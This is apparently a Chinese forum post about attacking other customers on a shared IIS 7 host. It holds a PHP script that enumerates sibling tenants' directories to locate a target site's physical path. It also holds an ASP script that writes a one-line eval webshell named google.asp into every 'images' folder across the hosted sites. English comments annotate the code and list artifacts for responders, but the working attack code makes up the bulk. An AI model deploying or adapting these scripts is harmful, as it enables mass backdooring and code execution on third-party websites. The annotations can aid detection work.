碰到个虚拟主机,iis7.0.里边有上万个站,只有脚本权限,没命令行权限,但是可以跨目录写文件.如果能得到目标站的物理目录,能立马搞定.但是想尽一切办法,也没找到物理路径.所以只有用脚本找了.手工找会累死的.一个php是找的,一个asp是写的.

 

<?php
// Directory-enumeration helper found on a shared IIS 7 host (see the note at the
// top of the page). From inside one tenant's web root it walks every customer
// directory under D:/Hosting and records where a given file name exists.
// NOTE(review): that it can read sibling tenants' directories at all means the
// host's per-site NTFS ACLs / application-pool identities (and PHP open_basedir)
// are not isolating tenants; that is the condition to fix on the host.
// Artifacts for responders: requests carrying ?key=...&dir=... to this script,
// and the output file named in $logfile below.

 set_time_limit(0);  // lift the execution time limit: the walk over thousands of directories is slow

$path = 'D:/Hosting';  // root that is enumerated; one sub-directory per hosted site



$somefile = $_GET['key'];  // exact file name to look for, taken unvalidated from the query string

$logfile = 'D:/Hosting/6668835/html/images/ennumdir.txt';  // hits are appended here, under the web root of site 6668835




  // Gate: only the *presence* of a Basic-auth header is checked. The user name
  // and password are never compared against anything, so any client that
  // answers the 401 challenge with arbitrary credentials reaches the scan.
  if (!isset($_SERVER['PHP_AUTH_USER'])) {

    header('WWW-Authenticate: Basic realm="My Realm"');  // the realm string is a usable signature in web/proxy logs

    header('HTTP/1.0 401 Unauthorized');

    echo 'Text to send if user hits Cancel button';

    exit;

  } else {





if(is_dir($path) && is_readable($path))

{

$path2 = '';  // last sub-directory visited; this is what the "[*]LAST" marker below reports

$handle = opendir($path);

while(false !== ($filename = readdir($handle)))

{

// Per-request bucket: only entries whose first character equals the `dir`
// query parameter are scanned, so the full walk is split over several requests.
// (The `{}` string-offset syntax dates this to PHP 5/7; it was removed in PHP 8.)
if($filename{0} != $_GET['dir'])

{

continue;

}



/*
 Disabled second-character filter (would narrow each request to a two-character prefix).

if($filename{1} != $_GET['two'])

{

continue;

}

              */



//$path2 = $path.'/'.$filename.'/html';   (disabled: earlier variant looked only inside each site's html folder)



               $path2 = $path.'/'.$filename;

if(is_dir($path2) && is_readable($path2))

{

@$handle2 = opendir($path2);  // '@' hides the warning for directories this identity cannot open

while(false !== ($filename2 = readdir($handle2)))

{



if($filename2 == $somefile)

{

//echo'[+]Found !'.$filename2."\n";

// A match is appended to the log file rather than echoed, so results survive
// even if this request times out or the connection is cut.
file_put_contents($logfile,'[+]Found !'.$path2.'/'.$filename2."\n",FILE_APPEND);

}



}

@closedir($handle2);



}

}

// Progress marker: records the last sub-directory this request reached.
file_put_contents($logfile,'[*]LAST '.$path2."\n",FILE_APPEND);

closedir($handle);

}





   }







<%

' Second stage of the same tooling: walks the sibling sites' folders and writes a
' file named google.asp into every "images" sub-folder it finds. The file content
' is a one-line eval of a request value, i.e. a server-side code-execution backdoor.
' Artifacts for responders: google.asp files with identical content and near-identical
' timestamps across many sites' images folders, and ASP pages on the host that use
' Scripting.FileSystemObject / Adodb.Stream to write outside their own site root.
Server.ScriptTimeout=500000000   ' effectively unlimited script runtime (value is in seconds)

key = Trim(Request.QueryString("key"))   ' first letter of the site folders to process; one request covers one letter

' Content written into every target file. The "%" & ">" is split so the closing
' tag does not terminate this script block. Chr(35) is "#", the name of the
' request value the dropped page evaluates. This exact string is the detection
' signature for the dropped files.
msg=" <% eval(rquese(Chr(35)))%" &">"

Set FSO=Server.CreateObject("Scripting.FileSystemObject")

' Root folder that is walked. NOTE(review): the PHP half of the page uses
' D:/Hosting; the path here was presumably edited for the post.
Set ServerFolder=FSO.GetFolder("C:\intel")

Set ServerFolderList=ServerFolder.subfolders







For Each ServerFileEvery IN ServerFolderList



 ' Response.write  ServerFileEvery&"</br>"   (debug output, disabled)




' Case-insensitive first-letter match against the `key` query parameter.
If LCase(Left(ServerFileEvery.name, 1)) = LCase(key) Then

Set sServerFolder=FSO.GetFolder(ServerFileEvery)

Set sServerFolderList=sServerFolder.subfolders




For Each sServerFileEvery IN sServerFolderList




' Only sub-folders literally named "images" (any letter case) are targeted.
If LCase(sServerFileEvery.name) = "images" Then




' Creates or overwrites <site>\images\google.asp unconditionally (StreamSaveToFile
' saves with overwrite mode), encoded as UTF-8.
StreamSaveToFile sServerFileEvery & "\google.asp", msg, "UTF-8"




End If




Next




End If

Next







 ' Writes sContent to sPath as text through an ADODB.Stream, creating or
 ' overwriting the file. Paths without a drive-letter colon are treated as
 ' relative and resolved with Server.MapPath. sCharSet is the text encoding
 ' handed to the stream (the caller above passes "UTF-8"). There is no On Error
 ' handling in this function, so a path this identity cannot write raises a
 ' runtime error to the caller.
 Function StreamSaveToFile(sPath, sContent, sCharSet)




Dim oStream




' Absolute paths contain a colon; anything else is mapped relative to the web
' root. The two Replace calls swap "," for "," and are no-ops as printed (the
' original characters may have been altered by the page encoding).
If(InStr(sPath, ":") <= 0)Then

sPath = Replace(sPath, ",", ",")

sPath = Server.MapPath(sPath)

sPath = Replace(sPath, ",", ",")

End If




Set oStream = Server.CreateObject("Adodb.Stream")

With oStream

.Type = 2   ' adTypeText

.Mode = 3   ' adModeReadWrite

.Open

.Charset = sCharSet   ' encoding applied to the text written below

.WriteText sContent

.SaveToFile sPath, 2   ' adSaveCreateOverWrite: an existing file is replaced silently

.Close

End With




Set oStream = Nothing   ' release the COM object




End Function




%>

 
